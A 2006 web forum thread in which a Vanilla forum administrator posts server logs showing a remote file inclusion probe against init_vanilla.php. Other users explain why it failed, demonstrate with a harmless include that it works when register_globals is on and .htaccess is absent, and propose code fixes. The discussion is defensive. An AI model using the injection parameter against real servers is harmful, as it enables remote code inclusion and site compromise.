Strange request in my log: GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com

fmimoso

Found this in my logs (scroll down, formatting gets broke):

88.214.193.xx - - [xx/Nov/2006:xx:x1:57 +0000] "GET /1/ HTTP/1.0" 200 42265 "http://www.google.com/search?q="powered+by+vanilla+1.0.1"&hl=en&lr=&safe=off&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:00 +0000] "GET /themes/vanilla/styles/soulscape/vanilla.css HTTP/1.0" 200 29861 "http://mysite.com/1/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:06 +0000] "GET /themes/vanilla/styles/soulscape/favicon.ico HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:09 +0000] "GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com HTTP/1.0" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x2:10 +0000] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:08 +0000] "GET / HTTP/1.0" 200 62286 "http://www.google.com/search?q="powered+by+vanilla+1.0"&hl=en&lr=&safe=off&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:19 +0000] "GET /themes/vanilla/styles/soulscape/favicon.ico HTTP/1.0" 200 1150 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"
88.214.193.xx - - [xx/Nov/2006:xx:x4:20 +0000] "GET /appg/init_vanilla.php?Configuration[APPLICATION_PATH]=google.com HTTP/1.0" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.8) Gecko/20061025 Firefox/1.5.0.8"

Any ideas of what it is?

Minisweeper

Not sure. Some of them just look like someone browsing your site (the css/icon requests) - not sure about the odd init_vanilla calls though. Possibly someone trying to fool the software into doing something it's not supposed to but i wouldnt worry about it too much - as you can see if you try it yourself it doesnt achieve anything. Has anything gone funky with your forum?

Dinoboff

you can't access these files directly. The request get a 403 error message because of the .htaccess in appg/:<Limit GET POST PUT> Order Allow,Deny Deny from All </Limit>

fmimoso

I've tested it and assured it wasn't harmful too but, nevertheless it got me wondering.

Nothing wrong with the forum so far. And those were the only requests from that IP.

Someone is trying something, what I don't know. Let this be a warning.

WallPhone

It looks like an benign test one would do before injecting some PHP into init_vanilla.php... which could happen on a host that doesn't allow or support .htaccess. (IIS?)

TomTester

@Wall: 'Benign'? Hehe... more like 'failed'.

@Mimosa: I'd keep tracking my logs if I were you fmim.

In that context, I highly recommend weblog storming (interactive log analysis)
I've used it more than once for clients to track and solve hacker attacks and 'benign tests' ;-)

WallPhone

The test is benign. After all, Google's homepage isn't exactly malicious code. Had the test succeeded, I am sure the following requests wouldn't have been so benign. Odd the attacker used "powered by vanilla" instead of "vanilla is a product of lussumo". /me goes to set up a honeypot.

Mark

Yeah - that's a wierd one. I almost want to disable my .htaccess to see what would happen. I don't think it would do much since it would require that safe mode be off. But if the .htaccess was gone and safe mode was off, it might do something wierd.

NickE

If the .htaccess file is disabled and register_globals is on, then it would indeed be possible to set variables which are not defined in that file. For example, with those conditions met, I created a file /random/appg/headers.php which contained the following code:

<?php echo('<'.'?php'); ?>

echo('HELLO WORLD!!!');

exit();

<?php echo('?>'); ?>

And here's what happened:


Again, this would only work in select circumstances, but it still, might want to do something about that mark.

Mark

I don't know what I could do besides warning people about it.

Anyone have any suggestions?

Max_B

Wipe out installer/updater files after install?

WallPhone

How about: if ( strpos($Configuration['APPLICATION_PATH']. $Configuration['LIBRARY_PATH']. $Configuration['DATABASE_PATH']. $Configuration['LANGUAGES_PATH']. $Configuration['LANGUAGE'], '://') ) { echo 'Cannot include remote libraries'; exit; }

EDIT: does not prevent direcory traversal or other attacks

MySchizoBuddy

shouldn't register_globals ALWAYS be off if the user has it on then its his/her problem. u cannot leave a door open and then find a way to put barb wire in front of it. why not keep the door closed.

NickE

What I've seen several other applications do, Mark, is have a (special) definition somewhere in the settings file, then check to make sure it's defined before continuing. So if you had something like define('IN_VANILLA', 1); in your settings file, then this would be the first line in files like init_vanilla.php:if(!defined('IN_VANILLA')) exit();

WallPhone

This came to me in a dream: Include_once('settings.php');.

The idea is if settings is already included, the statement is ignored. If it is not, then it gets included and initializes the paths. Other functions that might be useful are get_included_files() and function_exists().